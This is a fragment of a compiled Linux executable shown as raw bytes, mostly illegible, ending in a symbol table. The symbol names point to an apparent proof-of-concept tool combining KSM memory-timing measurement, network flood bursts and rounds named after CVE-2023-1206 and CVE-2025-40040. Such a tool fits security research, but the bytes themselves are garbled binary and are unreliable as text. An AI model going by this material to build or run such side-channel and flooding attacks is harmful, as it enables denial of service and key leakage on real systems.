(5�b-�Hn-�@Hz-�\H�-
�9��-
P5��-�kH�-�{H`,U/S/Y�U�`,T(V(Y�T��,0� s�U� %�U s"��,
T9�d,
N9�+U�V���U���V���U�?+0P0�S��S�+P7V�+V�+
P2�,�I�)GUG�S���U��)T]Y]��T�*'P'ISbkPklSs�S?*
29�?*@�?*UV)U�V���U���V-)
P��P��S��P�)V�'+U+�V��U��V��U��V���U��'"T"2Q2�]���T��'Q�\��Q��\��Q��\���Q�Z(
0�
1S1Es�EJs�JhSh�s���s�m(PSUPm(s3&�Ps3&�7s3&�U�s3&�m(s7�Rs7�7s7�U�s7��(
D�OYD��("
2��'/
01�(�+I(�`I(��I/(��ID(
�1��$�U��S���U���S�$�T��V���T���V��T��V�$yQy�\���Q���\I&@P@�]��P��]��]�&AX��X�&"}x'�"%P%A}x'���}x'��&$By1$#���������}#���������x#���������+(#���������-��$`^`cP��^%�T%�u��%Cu�C�q�`�"%P�
t3$t"2$t"�"%,0��%;0��%;V�%;5��%:U0&
2�T&60�T&5P56]T&6VT&66�T&5U'40�'4]'4V'46�'3Ui'30�i'3Vi'35�i'2U�'
�0�#"U"�S���U���S#=T=�\���T���T��\#MQM�_���Q���Q��_2#n0�n�P��V��0���P��V2#�0���^��0���^�#Y;v~'���Y��v~'��#4]49P��];#60�;#6\;#63�;#5Uq#
5��#&0��#%P%&V�#&\�#&4��#%Us$%0�s$%Vs$%\s$%4�s$$U�$%
�0�p"*U*uSuw�U�w�Sp"
T
vVvw�T�w�Vp"6Q6��Q��"Q�Q��"1��"U�P��"0��"H��"V�"S�"	��P! U �V���U�T!0��ST!0�p!1
�p!]1}o�p!v%R�!
5��!
�8�� UT�U�� 
u
Py�`�� 
0�
PX� 
0�
7ty#� 9%�7Cty#�9%�!	q���� $u����!�	r���� $u����!�!q���� $p����!�!U!Q!P!Q� P )S;XPXmSstPtuS�
�8��PS�
�8��PS���I US�U�8S8=�U��"U"USUV�U�VnS�S��I0[U[���}0?T?��T��&0���_�&0��&0���^��S��S�Po�P�	QC@�C
�C��}�T��}�C��}C
��1����}�U��}��U��S���U���S�T��V���T�QQ�^��^T�V���T
� $ &~"���VT0��q�*
��*�~�.}ʚ;��~"�*
��*�~�.0��~ʚ;��~"�*
��*�~�37}ʚ;��~"�*
��*�~�q0��FUF�S���U���S�S�T�V���T���V�V&
�8�&@����&]��&J��NJ�4��0��U��pJ�U�U� SuS�q�`� P�
t3$t"2$t"� <0�"GUGn�U�""T"G�TGn�T�"+Q+G�UGn�Q�"2R2G�XGn�R�"GXGn�X�L����)00;�j��47A-�(F
#&)@EMnd"'/B���`)03�n���
� H!#/!	&)!T!k[!
!F�!x""*/�#;X$H�$!��%;'>Y'H�'"'*/h(7F��(
OY[);;�).38;CCMR�+
d,�,
�,	�,�-
<H�� �FM�!��(�(���	� �/�;`C�Q�_�j�l�0�H`��\�p��\_��A��\
 ;�^3N�)^o)����'.���R�  `��!�\)p"�4M``g =s��-�+B���0q��t�`, `? N`[k0z���� T��P`�&�P!���$�	 `(��-FWh|#����`,Y��`����n� 3`? �P"n[�,g ��"����@`�Scrt1.o__abi_taginterleaved_key_agreement.csig_handlerrunningnet_init.coldksm_init.coldcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___snprintf_chk@GLIBC_2.3.4connect_to_peerrecv@GLIBC_2.2.5setup_listen_socketputchar@GLIBC_2.2.5run_interleaved__libc_start_main@GLIBC_2.34net_init_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5in6addr_any@GLIBC_2.2.5setsockopt@GLIBC_2.2.5recv_protoclock_gettime@GLIBC_2.17getpid@GLIBC_2.2.5_edataksm_cleanupfclose@GLIBC_2.2.5_finiaccept_peer__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5net_measure_floodsend@GLIBC_2.2.5sendto@GLIBC_2.2.5srand@GLIBC_2.2.5__data_startsignal@GLIBC_2.2.5optarg@GLIBC_2.2.5__gmon_start____dso_handlenet_flood_burst_IO_stdin_usedinet_pton@GLIBC_2.2.5time@GLIBC_2.2.5__isoc23_strtol@GLIBC_2.38ksm_measure_writelisten@GLIBC_2.2.5_endksm_calibrateround_cve_2025_40040__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4poll@GLIBC_2.2.5bind@GLIBC_2.2.5madvise@GLIBC_2.2.5round_cve_2023_1206fopen@GLIBC_2.2.5perror@GLIBC_2.2.5print_keygetopt@GLIBC_2.2.5ksm_enable_systemaccept@GLIBC_2.2.5ksm_initnet_cleanupconnect@GLIBC_2.2.5fwrite@GLIBC_2.2.5__TMC_END__ksm_fill_patternsend_protoprint_usage_ITM_registerTMCloneTablegetaddrinfo@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5usleep@GLIBC_2.2.5freeaddrinfo@GLIBC_2.2.5stderr@GLIBC_2.2.5socket@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.data.rel.ro.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��4a��i���q���o�	�	V~���o(
(
p��
�
�B��0��  0�PP�`` ���W��-�-
�00 � ; ;��<<���\�L��\�L��\�L 
�\�L���^�NP`P `P0 0P+'?PP6�P�JB5�RP���\0��g0��>w�����PP�	&	P�V��